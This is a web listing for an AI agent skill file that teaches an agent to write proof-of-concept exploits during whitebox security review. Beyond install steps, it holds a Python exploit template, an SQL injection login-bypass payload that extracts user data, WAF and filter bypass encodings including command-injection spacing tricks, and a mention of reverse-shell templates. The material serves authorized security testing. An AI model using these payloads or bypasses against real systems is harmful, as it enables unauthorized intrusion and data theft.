Exploit Techniques
This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox security review.
Best use case
Exploit Techniques is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox security review.
Teams using Exploit Techniques should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/exploit-techniques/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How Exploit Techniques Compares
| Feature / Agent | Exploit Techniques | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox security review.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Exploit Development Techniques
## Purpose
Guide the development of Proof of Concept (PoC) exploits to demonstrate confirmed vulnerabilities. This is Phase 3 of the whitebox security review process.
## When to Use
Activate this skill when:
- A vulnerability has been confirmed through local testing
- Writing automated exploit scripts
- Documenting exploitation steps
- Bypassing security controls
## Language Selection
Choose exploit language based on target:
| Scenario | Recommended Language |
|----------|---------------------|
| Web application (server-side) | Python |
| Client-side attack (browser) | JavaScript |
| Mixed (client + server chain) | Python + JavaScript |
| Binary exploitation | Python (pwntools) |
| Windows target | Python or PowerShell |
| Linux target | Python or Bash |
| Reusing application logic | Same as application |
## Python Exploit Structure
### Basic Template
```python
#!/usr/bin/env python3
"""
Exploit: [Application Name] [Vulnerability Type]
Author: [Your Name]
Date: [Date]
CVE: [If applicable]
Description:
[Brief description of the vulnerability]
Usage:
python3 exploit.py <target_url>
"""
import requests
import sys
import argparse
class Exploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
def check_vulnerable(self):
"""Verify target is vulnerable"""
# Implementation
pass
def exploit(self):
"""Execute the exploit"""
# Implementation
pass
def cleanup(self):
"""Remove any artifacts"""
# Implementation
pass
def main():
parser = argparse.ArgumentParser(description='Exploit description')
parser.add_argument('target', help='Target URL')
parser.add_argument('--check', action='store_true', help='Check only')
args = parser.parse_args()
exploit = Exploit(args.target)
if args.check:
if exploit.check_vulnerable():
print("[+] Target is vulnerable")
else:
print("[-] Target is not vulnerable")
return
try:
exploit.exploit()
finally:
exploit.cleanup()
if __name__ == '__main__':
main()
```
### HTTP Requests Pattern
```python
import requests
# Basic GET
response = requests.get(f"{target}/path", params={"key": "value"})
# POST with data
response = requests.post(f"{target}/path", data={"key": "value"})
# POST with JSON
response = requests.post(f"{target}/path", json={"key": "value"})
# With headers
headers = {"Authorization": "Bearer token", "X-Custom": "value"}
response = requests.get(f"{target}/path", headers=headers)
# With cookies
cookies = {"session": "abc123"}
response = requests.get(f"{target}/path", cookies=cookies)
# Session persistence
session = requests.Session()
session.post(f"{target}/login", data={"user": "admin", "pass": "pass"})
session.get(f"{target}/admin") # Session cookies maintained
```
## Exploit Development Workflow
### Step 1: Document Manual Steps
Before automating, document each manual step:
```
1. Send request to /login with username=admin' OR 1=1--
2. Extract session token from response cookie
3. Access /admin/users with session token
4. Extract user data from response
```
### Step 2: Implement Core Exploit
Translate manual steps to code:
```python
def exploit(self):
# Step 1: SQL Injection for auth bypass
login_data = {"username": "admin' OR 1=1--", "password": "x"}
resp = self.session.post(f"{self.target}/login", data=login_data)
if "Welcome" not in resp.text:
print("[-] Authentication bypass failed")
return False
# Step 2: Access admin panel
resp = self.session.get(f"{self.target}/admin/users")
# Step 3: Extract data
users = self.parse_users(resp.text)
return users
```
### Step 3: Add Error Handling
```python
def exploit(self):
try:
resp = self.session.post(f"{self.target}/login", data=payload, timeout=10)
resp.raise_for_status()
except requests.exceptions.Timeout:
print("[-] Request timed out")
return False
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
return False
```
### Step 4: Add Verification
```python
def check_vulnerable(self):
"""Non-destructive vulnerability check"""
test_payload = "admin' AND '1'='1"
resp = self.session.post(f"{self.target}/login",
data={"username": test_payload, "password": "x"})
# Check for SQL error or successful bypass
indicators = ["SQL syntax", "mysql_fetch", "Welcome admin"]
return any(ind in resp.text for ind in indicators)
```
### Step 5: Add Cleanup
```python
def cleanup(self):
"""Remove artifacts created during exploitation"""
# Delete uploaded files
# Restore modified data
# Remove created accounts
pass
```
## Bypass Techniques
### WAF Bypass in Payloads
```python
# URL encoding
payload = urllib.parse.quote(payload)
# Double URL encoding
payload = urllib.parse.quote(urllib.parse.quote(payload))
# Unicode encoding
payload = payload.encode('unicode_escape').decode()
# Case variation
payload = ''.join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))
```
### Filter Bypass
```python
# Space alternatives
payload = payload.replace(' ', '/**/') # SQL
payload = payload.replace(' ', '${IFS}') # Command injection
# Quote alternatives
payload = payload.replace("'", "\\x27")
payload = payload.replace('"', '\\x22')
```
## Output and Reporting
### Success Indicators
```python
def print_success(self, message):
print(f"\033[92m[+]\033[0m {message}")
def print_error(self, message):
print(f"\033[91m[-]\033[0m {message}")
def print_info(self, message):
print(f"\033[94m[*]\033[0m {message}")
```
### Structured Output
```python
def generate_report(self):
return {
"target": self.target,
"vulnerability": "SQL Injection",
"endpoint": "/login",
"parameter": "username",
"payload": self.payload,
"impact": "Authentication Bypass",
"exploited": True,
"data_extracted": self.extracted_data
}
```
## Security Considerations
### Safe Testing
1. Always test on authorized targets only
2. Use non-destructive payloads when possible
3. Implement cleanup routines
4. Avoid DoS conditions
5. Log all actions for accountability
### Responsible Disclosure
1. Document findings clearly
2. Provide remediation guidance
3. Allow reasonable fix timeline
4. Coordinate disclosure with vendor
## Additional Resources
### Example Files
Working exploit templates in `examples/`:
- **`sqli-template.py`** - SQL injection exploit with union/blind detection
- **`cmdi-template.py`** - Command injection with OS detection and reverse shell
- **`deser-template.py`** - Deserialization exploits (Python, PHP, Java formats)
### Integration with Other Skills
- Use **dangerous-functions** to identify initial targets
- Use **data-flow-tracing** to confirm vulnerability
- Use **vuln-patterns** for technique selection